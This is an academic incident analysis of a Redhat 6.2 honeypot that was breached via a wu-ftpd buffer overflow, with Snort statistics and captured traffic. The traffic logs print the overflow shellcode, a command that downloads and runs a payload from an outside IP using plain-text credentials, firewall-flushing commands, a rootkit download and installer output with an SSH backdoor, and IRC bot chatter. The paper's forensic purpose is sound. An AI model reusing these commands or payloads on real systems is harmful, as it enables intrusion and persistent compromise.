RESEARCH PAPERS

An Incident and Abuse Analysis of a

Compromised Redhat 6.2 Honeypot
1
Emran Mohd Tamil, 2 Abdul Hamid Othman,
1
Faculty of Computer Science and Information Technology, University of Malaya, 2 Faculty of Information
Technology & Quantitative Sciences, Department of System and Computer Technology, Faculty of Computer
Science and Information Technology, University of Malaya
1
emran@um.edu.my, 2hamido@tmsk.uitm.edu.my

Abstract
Honeypot in computer security is an emerging technology. Any networked computer would attract hackers that intentionally would
like to gain unauthorized access to it. A honeypot system is meant to be hacked in order to learn from it, or merely as a deception
mechanism. Within this research, we deployed several sets of honeynet architecture consisting of several Operating Sytems as the high
interaction honeypot which is connected to the internet via TMNet Streamyx Home DSL connection and monitored by a monitoring
station that used Snort IDS. Among all the high interaction honeypots deployed, the redhat 6.2 honeypot is among the most interesting
honeypots because it is one of the honeypots that has been successfully penetrated by a hacker who then abused it to launch other
attacks against other hosts. The honeypot also has been used as a bot server for several IRC channels. This paper discusses the detail
of the hacker’s activity within the deployed honeypot.

RESEARCH PAPERS
Keywords: high interaction honeypot, honeynet, buffer overflow in Redhat 6.2

1. INTRODUCTION against the honeypot. The honeypots are connected to a home

According to David Rainkow, one trick favoured by hunters
since prehistoric times still proves useful in the world of digital
networks: bait. Security specialists often construct systems that
appear vulnerable to attack, but actually offer no access to
valuable data, administrative controls, or other computers.
These machines, known as honeypots are intended to be
attacked, have no legitimate data, and are there to lure attackers
away from valuable network hosts, to collect data for research
or legal action, and to alert administrators of any attacks in
progress [1].
Streamyx user account. The honeypot would follow the
honeypot implementation guide proposed by the Honeynet
Project [4]. The analysis would be limited to identifying the
attacks based on protocol, port targeted, and services targeted,
as well as tactics, exploits and vulnerabilities associated with it.
Snort IDS architecture will be used to detect and identify any
intrusion attempt towards the honeypot. Ethereal will be used to
capture the network traffic to provide better analysis. For the
purpose of this paper, only analysis related to one of the
honeypot deployed (Redhat 6.2) will be discussed.

Lance Spitzer, a leading honeypot expert, describes honeypot as 3. RESEARCH METHODOLOGY

"a security resource whose value lies in it being probed,
attacked or compromised." This means that whatever that has
been designated as a honeypot, is expected to be probed,
attacked, and potentially exploited [2]. The honeypot is a
resource that pretends to be a real attack target, and the data
gathered will provide information about both the attack and the
attacker [3].
Within this research, we deployed several Operating Systems to
gather information about what could happen in a normal home
user’s computer connected to a DSL Internet connection. There
were several interesting results from the experiments. This paper
discusses a hacker activity on our Redhat 6.2 honeypot.
2. SCOPE OF THE RESEARCH & THIS PAPER
The data collected would be limited to the honeypot
implemented. The result would only identify and analyze attacks
The subsection below elaborates the research methodology
implemented in this research
3.1. Methodology overview
Data is collected from a network sensor that resides within the
same broadcast domain than the computer that is connected to
the Internet via DSL. A real operating system will be connected
to a DSL network. The decoy system will have similar
configuration to that of normal home DSL users. The IP address
of the honeypot will not be promoted in any way. This decoy
system has no protection from the internet (i.e. firewall) and will
be monitored to detect any suspicious activities or attacks
against it. The monitoring station collects network data traffic
that flows towards the honeypot to analyze whether there are
any suspicious activities towards the honeypot. Several
measures have been taken to ensure its invisibility such as
modifying the registry and using a modified version of a UTP
cable.

JASA 3 | July 2007 29

 RESEARCH PAPERS
In the end, there are two sets of data available from the feature would ensure that intruders have nothing to be
monitoring station. The 1st is the alert data reported by snort: the suspicious about, therefore the possibility to capture more data
raw data is interpreted by using a web based snort interpreter, becomes higher.
ACID. The second set is the raw network packet data collected
by ethereal in tcpdump format. The data would be analyzed to The architecture designed consists of a honeypot, a data
check any signs of attack or intrusion. collection system, a hub, a dsl router and a dsl modem. The
honeypot and the data collection system are connected to the
3.2. Data collection overview hub so they are in the same broadcast domain. All traffic is
The architecture built for this honeypot is similar to the visible to both of them, as they use a layer one hub. The
generation two honeypot architecture proposed by the Honeynet honeypots are put in the DMZ, so that any traffic to the IP
Project, except for the fact that the invisibility of the monitoring associated with the router is routed to it.
station is enhanced, and the data control feature is removed.
The OS chosen for the data collection system is windows XP
RedHat 6.2 (Server) installed with anonymous ftp server due to its stability and availability of tools for the OS. It is
enabled is used as one of the honeypot hosts. The operating important to ensure that the data collection system is invisible,
system’s network setting must use the network settings from the while at the same time being able to monitor network traffic
DSL router (DMZ IP address, gateway and DNS server). flowing from and into the honeypot. In improving the
invisibility, the registry of Windows XP has been modified so
The data control feature is a way to contain the hacker’s that the computer does not have the network configuration. The
activities to avoid the hacker’s misuse of the honeypot to attack step to modify the registry is taken from SNORT website.
other networks, as the liability would fall on the honeypot Therefore the computer will not generate any network traffic but
operator. Some data control technique examples are connection will still able to sniff the network traffic.
limiting (limit the outbound connection from the honeypot),
outbound firewall (disallowed outbound connection) or even To enable the monitoring station to be more invisible the UTP
traffic mangling[4]. Data control is not implemented due to cable has been modified so there will be one–way-traffic
limited resources as it would need an additional system to act as (receive only). Therefore this method technically and totally
PAPERS

the data control (firewall) system. Removing the data control eliminates the possibility of the monitoring station generating
REVIEW PAPERS

requires the honeypot operator to monitor their honeypot from any traffic that could alert any attacker about its presence.
time to time to avoid abuse. But the removal of the data control
RESEARCH

Internet

Demilitarized Zone (DMZ)

TALK / DATA ADSL Modem
TALK RS CS TR RD TD CD
Static IP : 192.168.0.x

ADSL Router (192.168.0.1)

7x 8x 9x 10x 11x 12x 7x 8x 9x 10x 11x 12x

Ethernet Hub
Ethernet

C
7 8 9 101112

A 123456 1x 2x 3x
A
4x 5x 6x 1x 2x 3x
B
4x 5x 6x Honeypot

Modified One Way UTP Cable

(Received Only)

Data Collection Centre

Windows XP
Registry Modified No IP
Sniffer Server
monitoring/analys is

Snort (IDS)
Ethereal (Network packet Collector)
MySQL (alert database)
ACID (data interpreter)

Figure 1 Honeypot Architecture

The network traffic is collected by ethereal. The format of the To simplify detection, an IDS is installed. Snort IDS is chosen
network traffic saved by ethereal is in the standard tcpdump as the IDS software for this setup. Snort is a lightweight
format. Tcpdump is the de facto format to store network traffic network intrusion detection system developed by Martin
[5]
. Roesch. It is based on the libpcap packet capture library
commonly used in many TCP/IP sniffers and analyzers. Snort is
a rule-based network IDS. Snort rules consist of known attack

30 JASA 3 | July 2007


signatures and commands. The content of each network packet
is compared against hundred of known attack signatures to
detect traffic that may contain identified malicious content [6].
The detail of the software used in the monitoring station is as
follows
• Snort 2.01 Build 88 with default install
• Acid 0.9.6b23
• ActivePerl 5.6.1.635 MSWin32 x86
• adodb360
• apache 2.0.47-win32-x86-no_ssl
• jpgraph-1.12.1
• mysql 4.0.13 win
• php4 win32
• phplot-4.4.6
• WinPcap 3.0
3.3. Honeypot Operation Setup
The honey pot architecture is setup in homes with DSL
accounts. The DSL account package used is provided by
TMNet. The package used to connect the honeypot is the
minimum package, with a modem provided by the ISP at the
speed of 384 KB per second, at RM88/month.
The architecture is then connected to the internet. The setup
would run continuously until few conditions are met. It will run
RESEARCH PAPERS
data collection process. However, this research is mainly
focused towards the data collected in the network traffic.
In analyzing the data, support software is used. Ethereal will be
used to read and interpret network traffic. Ethereal is a free
network protocol capture and analyzer for UNIX and Windows.
However the process to read a network packet by packet is
lengthy and would need a long time to produce any findings.
This is where the data reported by snort will be used as a
starting point to investigate the network traffic.
SNORT IDS software may only log detected alerts into a raw
log file or into a database. The open source version does not
include any GUI software to interpret the alert log. This is
where ACID fits in. ACID is a PHP application that can produce
statistics from alerts generated by SNORT. Descriptive analysis
is used to interpret the data. The software is capable of
generating graphs.
4. INITIAL RESULTS
The subsections below elaborate on the results.
4.1. Duration of honeypot uptime

RESEARCH PAPERS
Table 1: Duration of honeypot uptime
as long as possible to get more accurate data. However the setup
Start Stop Date Length IP
may stop due to certain reasons such as blackouts, internet
Date assigned
service downtime by ISP, and abuse by attackers.
Redhat 2003-12-19 2003-12-23 4 days 219.95.189.
6.2 49
The data collection process begins as soon as the setup is
connected to the internet. Any network traffic into and from the
Redhat 6.2 is the 3rd honeypot and the shortest running honeypot
honeypot is recorded in tcpdump format by ethereal.
with 4 days from 2003-12-19 until 2003-12-23. As stated in the
Simultaneously the process of identifying possible intrusions is
methodology, the honeypot will be connected to the DSL
done by snort IDS software. Any attack detected is logged and
connection uninterrupted for as long as possible in order to get
transacted to the mySQL database.
the most data (which will result into a more accurate statistic)
Other than these two data collection processes, the forensic
unless stopped by some reason. In this case, the Redhat 6.2 was
analysis of the compromised honeypot will also contribute to the
immediately stopped after we detected that it was being used as
a stepping stone to do reconnaissance activity (port scanning).

Table 2: Redhat 6.2 Attack Listing

Signature Classification Total

FTP login activity Unclassified 8 (0%)
FTP download files activity Unclassified 12 (0%)
SCAN SOCKS Proxy attempt attempted-recon 216 (1%)
SCAN Proxy (8080) attempt attempted-recon 86 (0%)
SCAN Squid Proxy attempt attempted-recon 80 (0%)
BAD-TRAFFIC tcp port 0 traffic misc-activity 96 (0%)
FTP RNFR ././ attempt misc-attack 150 (1%)
FTP CWD overflow attempt attempted-admin 2 (0%)
FTP wu-ftp bad file completion attempt misc-attack 2 (0%)
FTP command overflow attempt protocol-command-decode2 (0%)
ICMP Broadscan Smurf Scanner attempted-recon 13774 (95%)
WEB-IIS nsiislog.dll access web-application-activity 2 (0%)

JASA 3 | July 2007 31

 RESEARCH PAPERS
4.2. Snort Attack Log Analysis
This honeypot recorded 14430 alerts, under 12 types of alert
comprising 7 categories. There were only 18 source IP recorded,
with 12 destination ports targeted.
This honeypot registered 14430 alerts with 13774 or 95% of it
being the ICMP Broadscan Smurf Scanner.
Based on SNORT rule documentation, ICMP echo requests are
used to determine if a host is running at a specific IP address. A
PAPERS
REVIEW PAPERS
RESEARCH
Figure 2: Signature Classification for Redhat 6.2
5. REDHAT 6.2 HACKER’S ATTACK
OBSERVATION AND DESCRIPTION
5.1. Overview
The Redhat 6.2 honeypot has been hacked within the first day.
The attacker entered the server using the buffer overflow
technique towards wu-ftp server version 2.6.0. After
successfully adding a username and installing a rootkit (a set of
programs that replace most common system programs in favour
of the attacker and automatically erase log files to hide their
presence) the attacker used the honeypot as his base to launch
several attacks and reconnaissance activities. Some of them
included actively scanning the internet to find vulnerable ftp
32
remote attacker can scan a large range of hosts using ICMP echo
requests to determine which hosts are operational on the
network.
As shown in Figure 2, due to the ICMP broadscan scanner
launched by the attacker, the attempted recon category is
extremely high compared to other classifications.
servers, launch IRC bot servers, and broadscan smurf attacks.
The complete activity is profiled in the attack description
section.
5.2. Supporting data
The next table shows partial data extracted from the tcpdump file
showing how the attacker gained entry into the server via ftp
server buffer overflow. The data is captured by using ethereal as
the attacker is using clear text communication format (ftp, telnet,
irc) for the intrusion and abuse processes. The most unimportant
data was snipped (shown as “(snipped)”) as the whole set of
data is too long. Some explanations are provided on the sideline.
JASA 3 | July 2007
 RESEARCH PAPERS

220 localhost.localdomain FTP server (Version wu-2.6.0(1)

Mon Feb 28 10:30:36 EST 2000) ready.
USER ftp
331 Guest login ok, send your complete e-mail address as password.
FTP server with long characters

PASS mozilla@
Buffer overflow- Flooding the

230 Guest login ok, access restrictions apply.

RNFR ././
350 File exists, ready for destination name
(snipped)
PWD
257 "/" is current directory.
CWD 00000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000ðÿÿÿÿÿÿüÿÿÿÿÿÿ”á
__xý _ëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëë
ëëëëëëëëëëëëëëëëëëëë 1ÛC¸
tQ
-____P‰áj_X‰ÂÍ€ë_1Û÷ãþÊYj_XÍ€ë_èíÿÿÿÿÿÿ
550 00000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000ðÿÿÿüÿÿÿ”á__xý
_ëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëëë
ëëëëëëëëëëëëëëë 1ÛC¸
online then adds user raul before flushing all
Attacker installs some script, checks who is

tQ
-____P‰áj_X‰ÂÍ€ë_1Û÷ãþÊYj_XÍ€ë_èíÿÿÿ: File name too long.
CWD ~/{.,.,.,.}

(snipped)

RESEARCH PAPERS
CWD ~{

sP
3Û÷ã°F3ÉÍ€jT‹Ü°'±íÍ€°=Í€R±_hÿ../Dâø‹Ü°=Í€XjTj(XÍ€j
X™Rhn/shh//bi‰ãRS‰áÍ€ncftpget -u xlogicus -p dupa16ani 206.253.222.88 .
'xlogic.tgz';tar zxvf xlogic.tgz;cd xl;./install;
w
12:37am up 2 days, 16:17, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - Fri 8am 2days 0.43s 0.33s -bash
/usr/sbin/adduser raul
firewall rules

passwd raul
a
a
Changing password for user raul
passwd: all authentication tokens updated successfully
/sbin/ipchains -F
/sbin/iptables –F

The next data extracted with ethereal shows telnet communication initiated after the previous entry.
This telnet shows the attacker downloading a rootkit from a geocities ftp account then installing the rootkit.

ftp -v 66.218.65.72
Connected to 66.218.65.72.
220-Welcome to the Yahoo! Web Hosting FTP server.
Connecting to

220-Need help? Get all details at:

yahoo FTP

220-http://help.yahoo.com/help/us/webhosting/gftp/
220-
server

220-No anonymous logins accepted.

220 Yahoo!
Name (66.218.65.72:raul): rr0v0vvv bbb1b1_s_sefvefv vv
331-Enter your Yahoo! member password
331
Password: (snipped)
230-You are using 1.6% of your subscribed disk space
230 You have 541.222 MB of space available

JASA 3 | July 2007 33

 RESEARCH PAPERS
Remote system type is UNIX.

containing rootkit
Using binary mode to transfer files.
(snipped)
Retrieve file ---> RETR raul.tgz
150 Opening BINARY mode data connection for /r0bb1_sev/raul.tgz (438592 bytes).
(snipped)
./setu./setpup
(snipped)
[0m
[0;32mStarting Rootkit Instalation .... [0m
[1;31mMakeing Home Directory And Copying Programs ... [0m
[0;32msniffer ... [0m
[0;32mcuratare ... [0m
[1;31mDone With Directorys & Programs ... [0m
[1;31mRemoveing Original Files ... [0m
[1;31mAnd Replaceing With Ours ... [0m
ls: /usr/bin/socklist: No such file or directory
Rootkit installation process

ls: /usr/bin/socklist: No such file or directory

cp: ../utils/siz: No such file or directory
ls: /usr/bin/socklist: No such file or directory
ls: /usr/bin/socklist: No such file or directory
[1;31mCopying SSH Files ... [0m
[0;32msshd_config ... [0m
[0;32mssh_host_key ... [0m
PAPERS

[0;32mssh_random_seed ... [0m

REVIEW PAPERS

[0;32msshd ... [0m

[1;31mDone With SSH Files ... [0m
[1;31mCreating Startup Files ... [0m
RESEARCH

[1;31mStarting SSHD Backdoor & Sniffer ... [0m

[1;31mDone ... [0m
[1;31mGathering System Info & Sending Mail... [0m
[1;31mDone ... [0m
[1;31mRemoveing Our Tracks ... [0m
[1;32m[D] [O] [N] [E] ... [0m
[1;32m

It is also interesting that the honeypot has been used as a IRC :Stere-!~Stere@Hydden.users.undernet.org PRIVMSG
#NOVAmusic :de unde sa am mah
bot server. The bot joined several channels like #NovaMusic, :Stere-!~Stere@Hydden.users.undernet.org PRIVMSG
#sock, #socklist, #selekt and lots more. The data shows irc #NOVAmusic ::)
communication in several channels. The language of the :Stere-!~Stere@Hydden.users.undernet.org PRIVMSG
communication is unknown but it is believed to be Romanian, as #NOVAmusic :parca nu stii
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic
searching the web with the irc communication phrases returns :16 are
several Romanian sites. The data in the appendix shows the :ryz!~ryz@ryz.users.undernet.org PRIVMSG #Reject
initial connection and communication recorded of the bot : ACTION m-a ferit de foc si apa am s-o iubesc viata
connection to the IRC server. toata m-a ferit de ce a
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG :FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG
#NOVAmusic :lasama sa vb cu Stere- #NOVAmusic :lolz
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG
:loool #NOVAmusic :ba nexa
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG
:are multi ma Stere- #NOVAmusic :ce esti bulangiu
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG :baiatu!~Yo@NeXa.users.undernet.org PRIVMSG
#NOVAmusic ::)) #NOVAmusic :da FrIZz
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic :FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG
:stai asa ca`ti zic yo cati are #NOVAmusic :zi adevaru ca am 1 2 sau 3
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG :baiatu!~Yo@NeXa.users.undernet.org PRIVMSG
#NOVAmusic :ll #NOVAmusic :lol
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG :baiatu!~Yo@NeXa.users.undernet.org PRIVMSG
#NOVAmusic :lol #NOVAmusic :asa sunt yo ma
:Stere-!~Stere@Hydden.users.undernet.org PRIVMSG :baiatu!~Yo@NeXa.users.undernet.org PRIVMSG
#NOVAmusic :nexa #NOVAmusic :nu nu

34 JASA 3 | July 2007

 RESEARCH PAPERS
:baiatu!~Yo@NeXa.users.undernet.org PRIVMSG 5.3.4. Severity
#NOVAmusic :ia bagai si la mine
The severity of this attack is quite high as the honeypot was
:baiatu!~Yo@NeXa.users.undernet.org PRIVMSG
#NOVAmusic :tnpqyw is tnpqyw@81.196.129.135 * used as a base by the attacker. If the honeypot was used to
HelloWorld launch attacks against other networks, then the honeypot
:baiatu!~Yo@NeXa.users.undernet.org PRIVMSG operator may be liable for any damage caused.
#NOVAmusic :asta`i unu
:baiatu!~Yo@NeXa.users.undernet.org PRIVMSG
#NOVAmusic :si cred ca`s de win
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG 5.3.5. The probability that the Source Address was
#NOVAmusic ::) spoofed
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG
#NOVAmusic :lolz There is no possibility that the source address used to penetrate
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic and to connect to the honeypot was spoofed as all three ways
:tu ce zici TCP handshake was completed.
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic
:da
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic
:zii 5.4. Attack description
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG
#NOVAmusic :zi si mie unde imi fac si eu un root
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG
5.4.1. Attack mechanism
#NOVAmusic :sau un shell The attacker used buffer overflows to overwrite the honeypot
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic memory with own commands. Their initial command includes
:nu stiu nana installing unknown programs and adding a user account for
:nexa!~sada@Ou.users.undernet.org PRIVMSG #NOVAmusic
:te costa future legitimate access. It is interesting to note that, based on
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG the data extracted, the attacker flushed out all firewall rules
#NOVAmusic :am 3000000 $ inside the honeypot system with the ipchains –F and iptables –F
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG command. The attacker later installs a rootkit to further grip the
#NOVAmusic :ma doaren pola
:FrIZz!~ady@FrIZz.users.undernet.org PRIVMSG server under their control.
#NOVAmusic :::P))

RESEARCH PAPERS
6. HACKING TO ABUSE PROCESSES DISCUSSION
5.3. Other Observations
Figure 3 shows the summary of the Redhat 6.2 hacking towards
abuse processes.
5.3.1. Detection
Initial detection was through SNORT and extensive outbound
6.1. Reconnaissance/Scanning
Gaining Access

connections initiated from the honeypot. However, the analysis
Escalating Privileges & Covering Tracks
concentrates on the network packets collected by ethereal in
The source sends TCP SYN Scan to determine whether the
tcpdump format, as all the attacker’s activities are recorded
targeted host uses a vulnerable FTP host (like ours). It then
there. Most data is extracted via ethereal.
buffer overflows the server, installs some script downloaded
from 206.253.222.88 and adds the user name raul into the
5.3.2. Source of attack
system. The source of the attack is a computer from India (based
The IP that is initially used in the attack is 203.197.136.8. The
on the source IP). From the speed of the overall initial process,
query at APNIC shows that the IP address belongs to an ISP
it is believed that the attacker used automated tools for scanning
company in INDIA. The next source IP that the attacker used to
and gaining the first entrance.
log in using the telnet program is 213.233.97.236. The search
A few hours later, the attacker logs in (from a computer in
shows that the IP belongs to an ISP in Romania.
Romania) with the username that its tool has previously created
for him using the telnet protocol (which enables us to monitor
This further supported theory that the attacker uses several bases
his activity due to telnet’s clear text protocol). After that the
as launch pads from all over the world to cover his tracks and
attacker downloads and installs a rootkit from a paid webhosting
preserve his anonymity. Intruders usually keep several
account with Yahoo. It is not known whom this account belongs
computers under their control, called step through hosts, from
to, as there is some possibility that the account is a stolen
which they access other computers [7].
account (researcher’s attempt to access the account with the
same username and password a few days later failed). The
5.3.3. Evidence of Active Targeting
rootkit replaced most system files and deleted log files to ensure
As the attacker used only ftp related exploits to gain entry, and
its invisibility.
coupled with the fact that the honeypot has an ftp server, this
shows active targeting. Furthermore the honeypot then sends an
email stating the honeypot’s info to the hacker’s email.

The honeypot is also used as the launch pad for reconnaissance

and IRC activity. This is definitely an active targeting.

JASA 3 | July 2007 35

 RESEARCH PAPERS
of the honeypot is that it could be used as a platform to attack
other targets[12]. The abuses forced us to cut short the honeypot’s
life, to avoid any liability.

The Redhat 6.2 honeypot has been hacked within its first day
online. Even though Redhat 6.2 is an outdated operating system,
the danger is not limited to the OS alone [13]. It is shown that
attackers will exploit vulnerable software to gain entry to their
target host.
The only reason they still used an old exploit is because it still
worked (which means old systems with known vulnerabilities
still exist). Firewall implementation can help to eradicate
unwanted traffic. Users must always update their systems and
disable any services that they do not need.

8. REFERENCES

[1] David Raikow (2000) ZDnet Article:Building your own

Honeypot, Retrieved 20 Mac 2006 from
http://www.zdnet.com.au/news/security/soa/Building_your_o
wn_honeypot/0,2000061744,20106785,00.htm
[2] Lance Spitzner (2000),Building A Honeypot, Retrieved
November 14,2005 from
http://rootprompt.org/article.php3?article=210
[3] Reto Baumann and Christian Plattner (2001) , White Paper:
Honeypot, Retrieved 23 Nov 2005 from
http://www.inf.ethz.ch/~plattner/ pdf/whitepaper.pdf
[4] Honeynet Project (2003) Know Your Enemy: Honeynet.
PAPERS
REVIEW PAPERS

Retrieved 23 Nov 2005 from

http://www.honeynet.org/papers/honeynet/index.html
[5] David J Marchette (2001) , Computer Intrusion Detection and
Network Monitoring : A Statistical Viewpoint, Virginia,
Springer.
RESEARCH

[6] Kuik, B.V.(2001) Intrusion Detection Systems: General

Overview and Technical Insights. Retrieved Nov 12, 2003
from http://www.vankuik.nl/bart/docs/report.pdf
[7] Kunikazu Yoda and Hiroaki Etoh (2000),Finding a
Figure 3 Redhat 6.2 Attack Process Diagram Connection Chain for Tracing Intruders,in 6th European
Symposium on Research in Computer Security, Toulouse,
France, October 2000
6.2. Information Gathering
[8] Honeynet Project (2000), Know Your Enemy: Motives.
After gaining access and root privileges, the attacker sends an Retrieved 23 Nov 2005 from
email containing the system profile like ip address, processor, http://www.honeynet.org/papers/motives/
hardisk space and ping statistics to an email which is believed [9] Lance Spitzner (2002), Honeypots: Tracking
belongs to the attacker. After that, the attacker launches ICMP Hackers,Boston:Addison Wesley.
broadscan which is assumed to determine available network [10] Stuart McClure,Joel Scambray & George Kurtz (2003)
computers or resources within the honeypot network. The attack Hacking Exposed, 4th Edition.California:Mc Graw Hill
accounts for 95% of overall alerts generated by SNORT. [11] EC-Council (2003), Participant Handout for Ethical Hacking
Workshop.
[12] Lance Spitzner (2003), Honeypots: Are they illegal?,
6.3. Abuse
Retrieved November 28,2005 from
The honeypot is then abused by the attacker. The first abuse is http://www.securityfocus.com/infocus/1703
that it is being used to host an irc bot within several irc [13] Stephen Holcroft (2002), Incident Analysis of a
channels. Later, the honeypot is used to scan the internet to Compromised RedHat Linux 6.2 Honeypot , Retrieved 20
collect vulnerable FTP server ip addresses. As stated previously, Mac 2006 from
the last abuse forced us to cut short the honeypot’s life time by http://www.holcroft.org/honeypot/Incident/sholcroft-4.1-
disconnecting the TMNet Streamyx modem. 2002.html

7. CONCLUSION

The deployed honeypot provided an insight of how a hacker (or

script kiddy) hacks their way into a system [8-9]. It provides
valuable information and confirmation of known cracker
methodology from reconnaissance to gaining access and abuses
[10-11]
. However this research also shows that one disadvantage

36 JASA 3 | July 2007